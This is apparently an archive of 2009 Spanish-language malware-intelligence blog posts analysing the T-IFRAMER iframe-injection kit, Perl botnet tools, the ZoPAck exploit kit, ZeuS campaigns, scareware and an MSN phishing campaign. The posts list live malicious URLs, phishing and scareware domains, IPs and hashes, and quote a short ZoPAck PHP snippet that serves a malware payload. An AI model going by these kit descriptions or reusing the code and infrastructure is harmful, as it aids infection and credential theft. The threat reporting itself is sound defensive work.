Freehosts accounts (páginas alojadas en hosting gratuito). Se listan todos los ftp vulnerados de los sitios web que se encuentran alojados en hosting gratuitos.
Unchecked accounts (cuentas no chequedas). Cuentas que aún no se han revisado.

Las siguientes capturas muestras dos de los ftp vulnerados. En cada uno de ellos se puede almacenar cualquier tipo de información (warez, cracks, material pornográfico, phishing, material de pedofilia, cualquier tipo de malware, etc.). La primera de ellas aloja software y la segunda es un mirror para descarga de distribuciones basadas en *NIX.

El módulo Manager es en sí mismo el panel que permite la administración de cada una de las categorías antes mencionadas, incluyendo la posibilidad de eliminar directamente el ftp del historial.

Hasta esta instancia, estos primeros módulos tienen que ver con todo lo relacionado a la gestión de las cuentas. Sin embargo, no termina con estos y los siguientes módulos son más agresivos.

Uno de ellos es el módulo Iframes. Este permite configurar la estrategia de ataque a través de etiquetas iframe, ocultándola (como es habitual) en un script. En este caso, el script utilizado posee como información la url http://flo4.cn/1.txt.

A su vez, esta url contiene como referencia otra url, pero en este caso, contiene un bruto script que contiene varios exploits y descarga automática de malware.

En esta instancia, luego de intentar correr el exploit, se redirecciona al dominio http://www.google.ru, que parecería manipula la devolución de las búsquedas.

Los exploits que posee son los siguientes:

CVE-2009-0927 (Adobe getIcon)
CVE-2008-2463 (Office Snapshot Viewer)
CVE-2008-2992 (Adobe util.printf overflow)
CVE-2008-0015 (MsVidCtl Overflow)
CVE-2007-5659 (Adobe Collab overflow)

Los códigos maliciosos que se descargan son:

ehkruz1.exe. Se trata de un troyano diseñado para capturar la información relacionada al servicio WebMoney y hasta la fecha posee un bajo índice de detección, detectándolo sólo 6 motores antivirus de 41. El nombre del archivo es aleatorio.
egiz.pdf. Contiene exploit (CVE-2007-5659, CVE-2008-2992 y CVE-2009-0927) con una tasa de detección baja, 7/41 (17.08%). Descarga el binario.
manual.swf. Contiene exploit. Su tasa de detección es media-baja, 15/41 (36.59%).
sdfg.jar. Es un troyan downloader con exploit. Su tasa de detección es meda-baja, 14/41 (34.15%).
ghknpxds.jpg. Contiene un exploit. Su tasa de detección es muy baja, 4/41 (9.76%).

El módulo Injector se encarga de las acciones de inyección del código iframe creado a través del módulo anterior, permitiendo configurar una serie de parámetros para optimizar el ataque; por ejemplo, permite controlar el PageRank, inyectar el código, limpiarlo en caso de ser necesario, chequear el país del hosting y las cuentas ftp, establecer qué dominios atacar (1º y 2º nivel, ambos configurables), configurar expresiones regulares con los nombres de carpetas y archivos más comunes de encontrar en un servidor web, entre otras.

Investigando un poco más los dominios involucrados, salta a la vista que esta aplicación esta siendo utilizada como herramienta de "apoyo" por un conocido crimeware, y del cual ya hemos hablado en este blog, se trata de la última versión de Fragus.

Es decir, el dominio "escondido" entre las etiquetas iframe redirige a una nueva url desde la cual una batería de exploit intentan alcanzar con su artillería a los equipos potencialmente vulnerables, y descargar el malware encargado de reclutar la zombi.

T-IFRAMER posee dos grupos bien diferenciados. Por un lado el de administración y por el otro el de ataque; además de, evidentemente seguir alimentando la botnet; con lo cual está bien claro que quienes se encuentran detrás de este tipo de crimeware saben realmente lo que buscan y, aunque el desarrollo de la aplicación sea muy sencillo, es lo suficientemente efectivo como para ser utilizada por una des botnets más efectivas de la actualidad como lo es fragus.

Por último, estas acciones son muy similares a las realizadas por Gumblar (que según algunas fuentes sería de origen chino, aunque lo dudo); y si bien no puedo asegurar que en este caso se trate de los mecanismos que permiten diseminar Gumblar, sobre todo porque en primera instancia este Kit es de origen ruso (al igual que fragus), no cabe dudas que la estrategia (en su conjunto) es muy similar ¿será lo que hoy muchos llaman Gumblar?

Información relacionada
Fragus. Nueva botnet framework In-the-Wild
ZoPAck. Nueva alternativa para la explotación de v...
ZeuS Botnet y su poder de reclutamiento zombi
DDBot. Más gestión de botnets vía web
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, (...) y propagación de malware
Liberty Exploit System. Otra alternativa (...) para el control de botnets
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Los precios del crimeware ruso. Parte 2

Jorge Mieres

Desarrollo de Botnets Open Source. “My last words”?

2009-11-06T09:00:00.000-03:00

Quienes leyeron el post sobre el proyecto crimeware denominado Quad System, recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de botnets, tanto para plataformas Windows como para plataformas GNU/Linux.

El tema es que… por cosas de la vida misma… el desarrollador de estos particulares proyectos diseñados en Perl, llamado cross, había terminado con sus hazañas censurándose a sí mismo con el cierre de su sitio web; manifestando, a través del mismo, las motivaciones que llevaron a su "violenta" decisión, y las cuales muestro en la siguiente captura:

Sin embargo, luego de varios días ~~(de meditación quizás)~~, se decidió por volver a las andadas poniendo nuevamente a disposición ~~con fines educativos~~ un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware.

La nueva interfaz de su web es la siguiente:

Un dato curioso, que como el resto del post no guarda ninguna relación técnica con los aspectos de seguridad de la información, es la introducción al concepto de "Ironía" que plantea en el index ¿será que se siente irónico con sus propuestas colaborativas en el ámbito delictivo?

De todos modos, el chico aún parece enojado… ¿con los profesionales de seguridad?... ya que con interfaz nueva sigue escribe lo siguiente:

"…This site is dedicated to my projects and only my projects. Long time ago here you could find some more information, but currently, I don’t give a shit about providing any kind of information.

Besides, well, WTF? xD Something about me: I am the only one who is keeping this site somehow online and alive, taking care of it well, not much to take care of. What you can find here: some useless shit - my small projects. Well, I know no one gives a fuck, me neither - I placed them here and here they are to stay, you like it or not. So, no fun in here :D

Fuck… and who is that idiot founded this fucked up god forsaken piece of shit? xD LULZ and LOL xD As you can see I keep my head up and travel through life with a smile on my damn bitching face and ain't giving a fuck, man.

So you'll ask what a damn morron should be of me, starting with such introduction? Well, I'm the man, say, cross is in the house babe xD Anyways, just fuck it. You got here my projects; I will put some new here too. Like once in a year. Blah...Some new papers maybe if I will have some good mood for writing or i will be drunk as hell to believe in it. Hah...Whatevah..."

A pesar de todo esto, este "sutil" personaje, aparentemente empedernido programador en Perl, posee algunas cosas interesantes como una GUI para Nikto :-)

Información relacionada
QuadNT System. Sistema de administración de zombis I (Windows)
Hybrid Botnet Control System. Desarrollo de http bot en perl
Desarrollo de crimeware Open Source para (...) administrar botnets
TRiAD Botnet III. Administración remota de zombis multi...
TRiAD Botnet II. Administración remota de zombis multi...
TRiAD Botnet. Administración remota de zombis en Linux

Jorge Mieres

QuadNT System. Sistema de administración de zombis I (Windows)

2009-11-04T09:00:00.000-03:00

De la mano del mismo autor de los sistemas de control y administración de botnets Open Source (cross), hace un par de meses vio la luz otro de sus ambiciosos proyectos diseñados para controlar y administrar botnets llamado Quad.

En este caso, se trata de la versión desarrollada para plataformas Windows llamada QuadNT Remote Administrator, pero también existe una versión para sistemas operativos basados en plataformas *NIX. Al igual que con sus anteriores proyectos, este crimeware se caracteriza fundamentalmente por estar desarrollado en lenguaje Perl. Un aspecto para nada común en este tipo de aplicaciones.

A diferencia de las aplicaciones anteriormente presentadas por su desarrollador, QuadNT Remote Administrator no es gratuito; es decir, posee una versión libre con limitaciones importantes y una versión full privada. Sin embargo, lamentablemente no vamos a poder conocer, quizás por el momento, el costo real de este crimeware, por razones que dentro de poco les comentaré.

Entre sus funcionalidades se destacan la posibilidad de realizar:

Connect Back Shell
Trash Flood
Mouse Logger
Keylogger
Proxy server
Encrypted Remote Terminal Emulator
Web HTTP Control Panel

Como lo comenta el mismo creador, este sistema de administración remota para el control de botnets se basa en tres aspectos fundamentales:

Una Consola del lado del cliente
Un Gateway del lado del servidor
Automatización de la red cliente que es la botnet en sí misma

Esta primera versión de QuadNT centra sus esfuerzos trabajando en modo usuario (Ring3). Sin embargo, cross, su autor, promete una segunda versión pero que trabaje a bajo nivel, exactamente a nivel del kernel o lo que es lo mismo, Ring0.

Aunque los proyectos anteriores son gratuitos, y aunque esta misma versión se ofrezca también en versión libre pero con limitaciones, todavía no gozan de buena aceptación en el mundo clandestino que marca el negocio del crimeware.

Sin embargo, ello no significa que no constituyan amenazas, de hecho son potenciales alternativas que demuestran que el desarrollo de aplicaciones para manipular botnets puede ser abordadas en lenguajes de programación no tan comunes en el campo de las redes zombis.

Información relacionada
Hybrid Botnet Control System. Desarrollo de http bot en perl
Desarrollo de crimeware Open Source para (...) administrar botnets
TRiAD Botnet III. Administración remota de zombis multi...
TRiAD Botnet II. Administración remota de zombis multi...
TRiAD Botnet. Administración remota de zombis en Linux

Jorge Mieres

Campaña de phishing orientada a usuarios de MSN

2009-11-02T13:59:00.000-03:00

Desde que comenzaron a popularizarse las páginas web que prometen proveer información sobre los contactos bloqueados en el cliente de mensajería instantánea de Microsoft, las campañas destinadas al robo de información privada de los usuarios, siguen en constante insistencia.

Lo cierto es que quienes confían en este tipo de engaños, son víctimas ni más ni nada menos que de una simple maniobra de Ingeniería Social que en muchos casos, goza de una efectividad relativamente difícil de aceptar, y destinada a realizar ataques de phishing.

Esta situación deja en completa evidencia los niveles de (in)madurez que todavía existe en materia de prevención y la necesidad de crear conciencia sobre el verdadero alcance e implicancias en seguridad de los conceptos de confidencialidad y privacidad.

En este sentido, una nueva campaña de phishing busca captar la atención de los usuarios que hacen uso del popular cliente de mensajería instantánea de Microsoft, MSN. Es decir, casi el 90% de las personas.

Detrás de una cobertura bajo el slogan "Verify who blocked you on their msn contact list", se esconde una campaña que estratégicamente y con paciencia va obteniendo nombres de usuario y sus respectivas contraseñas de todos aquellos interesados en saber quienes de sus contactos los han bloqueado… Sigo sin comprenderlo… :(

Desde el punto de vista técnico, bajo la dirección IP 121.54.174.85 (Hong Kong Hong Kong Sun Network Limited) se alojan una importante cantidad de dominios que redireccionan a la misma página fraudulenta. Estos dominios son:

ahem-they-blocked-me.com
cindrella-blocked-me.com
damnn-they-blocked-me.com
did-they-block-you.com
face-blocked-truth.com
find-reason-of-being-blocked.com
finding-who-blocks.com
friends-block-buddies.com
grab-block-status.com
grab-my-block-status.com
have-they-blocked-you.com
heroes-never-block.com
how-come-they-block-me.com
im-fedup-of-being-blocked.com
im-sad-im-blocked.com
ima-checking-block-status.com
jesus-he-blocked-us.com
kephsa.why-do-they-block.com
lame-friends-block-you.com
leme-check-block-status.com
mean-friends-block.com
mjzfx0.why-do-they-block.com
notice-they-blocked-u.com
oh-i-was-blocked.com
omg-they-blocked-me.com
phew-they-blocked-me.com
phewww-seems-i-am-blocked.com
puff-im-blocked.com
pwdgds.grab-my-block-status.com
sad-i-was-blocked.com
see-they-blocked-me.com
tchv9l.find-reason-of-being-blocked.com
they-were-haha.com
ufff-i-was-blocked.com
urr-he-blocked-us.com
weird-i-was-blocked.com
who-let-me-block.com
why-do-they-block.com
why-my-friends-block.com
wooh-im-blocked.com

Es sumamente importante tomar las medidas de precaución y prevención necesarias para no ser víctimas de este tipo de técnicas, extremadamente sencillas de llevar a cabo y extremadamente efectiva para quienes no están al tanto de ellas.

En este caso, no se trata de implementar una solución de seguridad a toda marcha sino de sentido común. De acceder la información sólo en la página web legítima y verificar la existencia de las medidas de seguridad que garantizan el cifrado de la información.

Sobre todo, para no preguntarnos luego cómo hacen para obtener gran cantidad de información sobre credenciales de autenticación de diferentes servicios de web y publicarlos en Internet sin restricción alguna :-)

Información relacionada
Nivel de (in)madurez en materia de prevención
Phishing Kit. Creador automático de sitios fraudulentos
Phishing Kit In-the-Wild para clonación de sitios web, versión 2
Phishing Kit In-the-Wild para clonación de sitios web
Estado de la seguridad según Microsoft
Phishing y "cuentos" en navidad
Phishing para American Express y consejos

Jorge Mieres

ZoPAck. Nueva alternativa para la explotación de vulnerabilidades

2009-11-02T07:25:00.000-03:00

Indudablemente, la problemática generada por las botnets a nivel global constituye una de las tendencias que en ningún paper se debería obviar. En este sentido, el desarrollo de aplicaciones destinadas al control y administración de zombis vía web, cuyas primeras repercusiones vieron la luz a fines del 2006 alcanzando en la actualidad la popularidad en la comunidad underground y delictiva, no cesa.

Bajo una particular interfaz de autenticación, aparece ZoPAck, un crimeware cuya primera incursión fue en el 2007, desarrollado en PHP y destinado a explotar vulnerabilidades a través de una importante gama de exploits.

La actualización a esta nueva versión, la 1.02, se produjo durante este mismo año 2009. Y si bien no se ha masificado su eso y no cuenta con la popularidad de otros, es un paquete que no tiene nada que envidiar a sus competidores y cumple de igual manera con el objetivo para el cual fue diseñado: reclutar zombis aprovechando debilidades en los sistemas operativos y aplicaciones.

Por intermedio de un archivo .pdf, provoca un desbordamiento de búfer (buffer overflows) en las aplicaciones Adobe Acrobat y Reader (CVE-2007-5659 y CVE-2008-0655), reclutando la zombi a través de la descarga de su ejecutable (file.exe) llamado desde el archivo exe.php. A continuación vemos parte de su código.

include "db.php";
include "mysql.php";
$db = new db;
$ip = getenv("REMOTE_ADDR");
$db->query("UPDATE statistics SET is_dw=1 WHERE ip='".$ip."'");
$filename = "./file.exe";
$size = filesize($filename);
$fp = fopen($filename, "r");
$source = fread($fp, $size);
fclose($fp);

La estructura de ZoPAck es muy sencilla al igual que su configuración permitiendo simplemente configurar a través de la interfaz los datos de autenticación y el dominio donde se alojará el crimeware para su acceso.

El módulo encargado de llevar los datos estadísticos, lo que a mí me gusta llamar el módulo de Inteligencia, le permite al botmaster recavar información relacionada a las características de cada computadora que forma parte de su red.

Esta característica podría tener dos lecturas. Por un lado, que el crimeware se encuentra diseñado con una notoria orientación a script kiddies o prospecto a delincuentes; por el otro, quizás el objetivo del autor (¿ZOPA?) es proporcionar una aplicación lo más optimizada posible para hacer de la labor de los ciber-delincuentes lo menos rigurosa posible.

En fin, un nuevo crimeware que se une a la colección de alternativas disponible en el mercado clandestino.

Información relacionada
ZeuS Botnet y su poder de reclutamiento zombi
DDBot. Más gestión de botnets vía web
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, (...) y propagación de malware
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa (...) para el control de botnets
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Los precios del crimeware ruso. Parte 2

Jorge Mieres

Compendio mensual de información. Octubre 2009

2009-10-31T09:00:00.000-03:00

Pistus Malware Intelligence Blog
27.10.09 Una recorrida por los últimos scareware XVII
24.10.09 ZeuS Botnet y su poder de reclutamiento zombi
19.10.09 Pornografía. Excusa perfecta para la propagación de malware II
19.10.09 Malware Intelligence Linkedin Group
18.10.09 Panorama actual del negocio originado por crimeware
17.10.09 ZeuS, spam y certificados SSL
14.10.09 DDBot. Más gestión de botnets vía web
13.10.09 Una recorrida por los últimos scareware XVI
08.10.09 Nivel de (in)madurez en materia de prevención
04.10.09 Automatización en la creación de exploits
01.10.09 Rompiendo el esquema convencional de infección

Evil Fingers Blog
27.10.09 ZeuS and power Botnet zombie recruitment
18.10.09 Current business outlook caused by crimeware
17.10.09 A recent tour of scareware XVI
10.10.09 Level of (im)maturity in prevention
09.10.09 Automation in creating exploits
05.10.09 Breaking the conventional scheme of infection

ESET Latinoamérica Blog
31.10.09 Reporte de amenazas de octubre
28.10.09 Propagación de ZeuS a través de falsa actualización de Microsoft
26.10.09 Gira Seguridad Antivirus. Ahora, en Venezuela
21.10.09 Constructores de exploits. Más actividades for dummies
15.10.09 Nueva edición de nuestro Curso de Seguridad Antivirus
13.10.09 Nueva variante de Adware pide recompensa

Información relacionada
Compendio mensual de información 2009

Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Jorge Mieres

Una recorrida por los últimos scareware XVII

2009-10-27T07:00:00.000-03:00

Tre AntiVirus
MD5: 3cc8970057e018c7e7e04db7875b7d24
IP: 213.163.71.207
Netherlands Rotterdam Interactive 3d
Dominios asociados
Treav.com

Result: 4/41 (9.76%)

core2750.openbiglibrarynow.com/stget2.cgi?host=host&id=2750 (94.125.90.163) - Inttranspnet-rest
yourguardonline.com/online/ (194.54.81.98), protectpconline.com/online/ (194.54.81.99) - Realon Service Llc
trustfighter.com/trustfighter.php (212.175.87.195), irutokking.com/download/ (212.175.87.196) - Ankara Netfactor Telekom Ve Teknoloji Hiz.as
quatrosimo.com/download, wolmanman.com/download/ (83.233.30.64) - Serverconnect I Norrland
yourmalwarescan04.com/download/ (204.12.226.171) - Wholesale Internet Inc
utka3medrdosubor.com/U1v0O5/8b0/w4j7AU9AHY (76.76.101.75) - Interweb Media

PC Scout
MD5: c5065272658d577293b167866a54136d
IP: 76.191.100.17
United States Seattle Sentris Network Llc
Dominios asociados
aportals.net, canfind.org, clicktotal.org, news-portals.net, pcscoutinc.com, pcscoutlab.com, pcsecuritycorp.com, protectionlabs.com

Result: 3/41 (7.32%)

Personal Guard 2009 = Smart Protector
MD5: 79c9b0c7e1626910e8f8cc54430784c7
IP: 91.213.126.61
Costa Rica Centerinfocom Ltd
Dominios asociados
personalguardt.com
smartprotectpro.com

Result: 25/40 (62.5%)

General Antivirus = Wind Oprimizer = Internet Antivirus Pro = Virus Alarm Pro
MD5: fd57ca6d8485a2edc20ca778b37aee76
IP: 91.212.107.103
Cyprus Nicosia Riccom Ltd
Dominios asociados
gobackscan.com, goneatscan.com, goscanadd.com, goscanback.com, goxtrascan.com, ia-pro.com, iantivirus-pro.com, iantiviruspro.com, wopayment.com, woptimizer.com

Result: 27/41 (65.86%)

Windows Mechanic
IP: 64.213.140.69
United States Global Crossing
Dominios asociados
fastsystem-guard.com, myprotected-system.net, pay2.malwaresdestructor.com, update2.virusshieldpro.com, update2.windowssystemsuite.com, windowsguardsuite.com, windowsmechanic.net, windowssystemsuite.com, winsecuritysuite-pro.com, www.virussweeper-scan.net, www.windowssystemsuite.com

devicestools.com/20100.php (68.178.232.99) - Godaddy.com Inc
windowsgenuineupdates.com (66.96.251.248) - Network Operations Center
extreme-anal.cn (195.88.190.240) - Bigness Group Ltd. Network
avpayform.com, avpaymentplus.com
avpluspayform.com, avpluspayment.com (91.207.117.176) - Republic Of Rays S.r.o
expresshomeinspect.com (62.90.136.237) - Haifa Loads
inspectanyhome.com (94.102.63.245) - The King Host
libertyexperiment.com (194.60.205.20) - Baltic Center Of Innovations Techprominvest Ltd
ezscanweb.com (91.213.126.200) - Centerinfocom Ltd
kill-virusa.com (91.212.107.7), gen-pay.com (91.212.107.102) - Nicosia Riccom Ltd

Antimalware Pro
MD5: 0de6a7d12eea219670dcc7319e3f065b
IP: 209.216.193.106
United States San Diego Deploylinux Consulting Inc
Dominios asociados
antimalware-software.org

Result: 7/41 (17.07%)

Security Tool
MD5: a1440f84388f1efb55ce48a095aeb468
IP: 78.129.166.98
Cayman Islands Cayman British Islands Offshore Network
Dominios asociados
altapcsecurity.com, antispyavailable.com, antispyinteractive.com, antispyinternet.com, antispywareavailable.com, antispywareutility.com, antivirusfreeonline.com, antivirusinteractive.com, bestsupportcenter.com, cybernetsafety.com, defenseinteractive.com, etotalsecurity.com, identitysecuritysuite.com, onlinecentersupport.net, onlinewebsupport.net, powersystemstability.com, securesoftwarebill.com, serversafety.com, spyremoveronline.com, stabilitysuite.com, supportnetcenter.com, supportonlinecenter.com, system-tuner.net, systemsecuritysupport.com, totalantivirusvivo.com, totalsurfguard.com, yourantimalware.com

Result: 0/41 (0%)

Información relacionada
Una recorrida por los últimos scareware XV I
Una recorrida por los últimos scareware XV
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres

ZeuS Botnet y su poder de reclutamiento zombi

2009-10-24T19:40:00.000-03:00

Como lo he comentado en varias oportunidades, ZeuS es una de las botnets más "mediáticas" (por ende una de las más conocidas y populares), más agresivas y la que posee mayor actividad delictiva con funciones avanzadas que permiten realizar ataques de phishing, monitorear las zombis en tiempo real y recolectar toda esa información a través de diferentes protocolos.

Estas actividades agresivas que fundamentalmente proponen metodologías para obtener información confidencial de las computadoras comprometidas por alguna de las variantes que forman parte de la familia ZeuS, cuentan actualmente con un amplio repertorio de páginas falsas de entidades bancarias y financieras destinadas exclusivamente a la recolección de información mediante phishing.

Asimismo, la posibilidad de contar con un módulo de monitoreo por el cual el botmaster puede estar visualizando en tiempo real absolutamente todo lo que se realiza en la PC zombi (navegación por servicios de webmail, transacciones bancarias, conversaciones por chat, etc.), supone un grave peligro que atenta directamente contra la confidencialidad.

Y aunque para muchos parezca una cuestión trivial, el solo hecho de saber que su desarrollador actualiza cada versión de ZeuS, desde el año 2007, aproximadamente una vez por mes, es un punto relevante que marca el por qué de su popularidad en el ambiente under.

Pero sin embargo, a pesar de todo esto, aún hoy parece que no se valoran en su justa medida las implicancias de seguridad que tienen implícitas las actividades, no sólo de ZeuS sino de cualquiera de las alternativas crimeware que día a día bombardean Internet con sus acciones delictivas.

Quizás, lo que a continuación les voy a mostrar sea un aspecto fundamental para comprender el verdadero alcance delictivo que tienen este tipo de actividades. Se trata de una botnet ZeuS con un corto periodo de vida, pero con un importante volumen de zombis reclutados que se aglomeran en su cuartel bajo la tutela del "negociante" esperando sus órdenes.

La siguiente captura muestra los zombis reclutados sólo en Rusia, en este caso, por el botmaster que inició sesión bajo el nombre "russian". Esta información se obtiene a través de la opción de filtrado, limitando la búsqueda con el acrónimo del país (RU).

Ahora… una de las preguntas que quizás muchas veces nos hacemos al hablar de botnets es ¿cuál es la capacidad de reclutamiento que poseen? y aunque la respuesta es relativa podríamos decir que no tiene límites, o que el límite estará dado en función de la capacidad de los servidores utilizados por los botmasters.

Pero, siguiendo el ejemplo anterior, podemos tener una idea lo suficientemente concreta sobre el poder de reclutamiento que posee, en este caso, el botmaster "russian".

Con una actividad de tres (3) meses, cuenta con una cantidad de 24.830 zombis. Algo así como casi 276 infecciones de ZeuS por día. Y si seguimos la lógica, estadísticamente hablado, la cantidad se podría cuadruplicar a lo largo del año.

Por otro lado, la posibilidad de administrar una botnet vía web, supone también que pueden ser administradas varias al mismo tiempo; es decir, que varios botmasters pueden utilizar la misma aplicación web (en este caso ZeuS) para controlar "sus" zombis. De esta manera, el usuario "russian" posee una actividad relevante. Pero también podemos obtener información de sus pares que se encuentran administrando zombis bajo el mismo dominio.

Por ejemplo, el usuario "system" posee 10.184 zombis pero reclutadas durante un periodo de 30 días. Aproximadamente 335 zombis por día. Todo, a través de una sola botnet ZeuS ¿se imaginan cuantas ZeuS como estas se encuentran In-the-Wild?

Mientras que el botmaster con menos actividad cuenta con tan sólo 34 zombis, pero en menos de 1 hora.

En resumen, independientemente del tiempo de actividad de una u otra botnet, la tasa de reclutamiento es muy alta.

Esto significa también que los mecanismos de prevención no son lo suficientemente efectivos, y de hecho un reciente estudio deja en evidencia que los mecanismos evasivos que incorpora ZeuS son lo suficientemente efectivos frente a los mecanismos de detección de muchas de las soluciones antivirus actuales.

No obstante, bajo un aspecto más riguroso, que el malware actual incorpore mecanismos auto-defensivos cada vez más eficaces no significa que los antivirus no son efectivos. Además, no todo pasa por la solución de seguridad y gran parte de la responsabilidad recae en el usuario ya que, en definitiva y siguiendo con el aspecto riguroso, un sistema no se infecta por sí solo.

Información relacionada

ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Especial!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Jorge Mieres

Pornografía. Excusa perfecta para la propagación de malware II

2009-10-19T12:20:00.000-03:00

Una de las temáticas más explotadas para la diseminación de códigos maliciosos es la pornografía. Evidentemente todo lo relacionado a lo porno despierta cierta característica, propia de todo ser humano, que responde a un concepto tan antiguo como la vida misma: la lujuria.

Asimismo, esta característica se engloba dentro de los llamados "pecados capitales" y representa un punto débil para los usuarios que buscan en Internet este tipo de material sin atender buenas prácticas de prevención; y cuando la excusa utilizada para ejecutar la acción de Ingeniería Social es la pornografía, la propagación de malware provoca un alza en el índice de infección de la amenaza.

En este caso, nos encontramos con un sitio web que simula respetar las normas que indican dejar en evidencia que el contenido del mismo posee material explícito sólo para mayores de edad; sin embargo y como es de esperar, marca el inicio de la estrategia de engaño.

En cualquiera de los botones en los que hagamos clic (enter site! o exit now! respectivamente) el efecto es el mismo,…

…se redirecciona a una página que despliega imágenes impúdicas que al seleccionar cualquiera de ellas, redirecciona nuevamente a otra que completa el ciclo de engaño.

Utilizando la típica maniobra de Ingeniería Social visual, pretende engañar al usuario con una imagen que especifica la necesidad de descargar la aplicación Flash Player 10, ofreciendo a los pocos segundos la descarga de un archivo llamado "adobeflashplayerv10.0.32.18.exe" (5f49907a0e20b4ddebc6c31bde9eb6f1), que es el malware con el nombre "mimetizado”.

Este código malicioso posee una tasa de detección baja (10/41 - 24.39%). Esto significa que puede tener un índice muy alto de infección en un rango de tiempo muy corto.

Entre otras acciones comunes del malware (manipular claves del registro, crear archivos, monitorear proxy), establece una conexión con la dirección IP 212.117.169.163 desde la cual descarga otro binario. En este caso, llamado "setup.exe" (839e68b258ca56a5693a47bd610415f5) que al igual que el anterior también es detectado por un número bajo de antivirus (11/39 - 28.21%).

Como podemos deducir, las maniobras que relacionan al malware con la pornografía son muy activas, y constituyen uno de los vectores más empleados para las actividades de engaño y diseminación de todo tipo de códigos maliciosos.

Información relacionada
Pornografía. Excusa perfecta para la propagación de malware
Técnicas de engaño que no pasan de moda
Ingeniería Social visual y el empleo de pornografía como vector de propagación e infección II
Ingeniería Social visual y el empleo de pornografía como vector de propagación e infección

Jorge Mieres

Malware Intelligence Linkedin Group

2009-10-19T12:00:00.000-03:00

Malware Intelligence es un proyecto que por el momento se encuentra en su etapa inicial y forma parte de un sitio web que a futuro estaré poniendo a disposición de toda la comunidad de Seguridad de la Información en general y Seguridad Antivirus en particular.

A continuación dejo una captura que corresponde a una de las secciones del sitio.

Su creación fue motivada por una serie de proyectos en materia de seguridad cuya intención es canalizarlos a través de ese canal pero al mismo tiempo proyectarlo hacia todos aquellos que deseen colaborar.

En este momento el grupo cuenta con 56 miembros y todavía no he dado a conocer los proyectos (sin embargo espero poder hacerlo para arrancar con todo el próximo año). Por lo que todos aquellos que quieran participar son bienvenidos.

Pueden acceder al grupo desde aquí.

Jorge Mieres

Panorama actual del negocio originado por crimeware

2009-10-18T07:00:00.000-03:00

Sin lugar a dudas, el panorama actual de las acciones delictivas globales que se canalizan a través de la web constituyen un negocio redondo y oscuro que se gesta en lo más subterráneo de los diferentes ambientes que ofrece Internet, robando información privada a través de diferentes "bichos"…

…que se diseminan ejecutando diferentes "planes" estratégicamente pensados, incluso desarrollando aplicaciones destinadas a automatizar los procesos delictivos que se comercializan en un mismo entorno clandestino, para luego trasformar todo en dinero.

Sin más preámbulo... la imagen resume todo :)

Información relacionada
CYBINT en el negocio de los ciber-delincuentes rusos
Software as a Service en la industria del malware
Los precios del crimeware ruso. Parte 2
Los precios del crimeware ruso. Parte 1
Comercio Ruso de versiones privadas de crimeware...
Automatización de procesos anti-análisis II

Jorge Mieres

ZeuS, spam y certificados SSL

2009-10-17T15:43:00.000-03:00

Como ya sabemos, las actividades delictivas propuestas por la botnet ZeuS a través de su familia de troyanos y a lo largo de ya dos años de gozar con la categorización In-the-Wild, se impone frente a otras actividades crimeware con un importante volumen de variantes que aún hoy siguen reclutando zombis proponiendo, como parte de su estrategia de engaño, nuevas alternativas.

En esta oportunidad, y como en otras, una de sus variantes se está diseminando por correo electrónico mostrando un mensaje que alude a la actualización manual del certificado SSL. El mensaje dice así:

"On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.

[Enlace malicioso]

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator"

Como es habitual en ZeuS, el ejemplar analizado presenta un patrón característico en la actualidad del malware, que se centra en la fusión de actividades propias de diferentes códigos maliciosos.

En este caso, posee un componente keylogger encargado de recolectar la información privada de los usuarios (nombres de usuarios, contraseñas, números de tarjetas de crédito, credenciales de acceso al Home-Banking) que utilizan la computadora comprometida. También establece una conexión con http://hostz-150909.com/zed1/table.bin para descargar su archivo de configuración.

Por otro lado, implanta en la zombi un backdoor a través del cual el atacante accede al sistema víctima sin demasiados inconvenientes; además de ejecutar actividades rootkit escondiendo los archivos maliciosos en una carpeta llamada "lowsec" (también oculta) que se crea en la carpeta de sistema. Los archivos son los siguientes:

%System%\lowsec\local.ds
%System%\lowsec\user.ds
%System%\lowsec\user.ds.lll

Todo controlado por el habitual archivo "sdra64.exe" característico de ZeuS que también crea en la carpeta de sistema; y a través de un módulo de auto-defensa intenta terminar los procesos del programa antivirus y del firewall.

Por suerte esta variante de ZeuS posee un índice de detección alto; sin embargo, estas acciones maliciosas son comunes de toda la familia de esta amenaza.

Según TrendMicro, esta nueva maniobra de ZeuS a través del correo estaría dirigida a los empleados de determinadas compañías; y a juzgar por la firma del mensaje (System Administrator) y que alude a una actualización manual del certificado SSL, el círculo de Ingeniería Social parece cerrarse.

Sin embargo, lo preocupante de todo esto, independientemente de sus maniobras y métodos de propagación, es la constancia que ZeuS sigue manteniendo a lo largo del tiempo desde la liberación de su código en el 2007 y de las distintas versiones, aunque antiguas, que pueden ser conseguidas sin demasiados esfuerzos.

Información relacionada
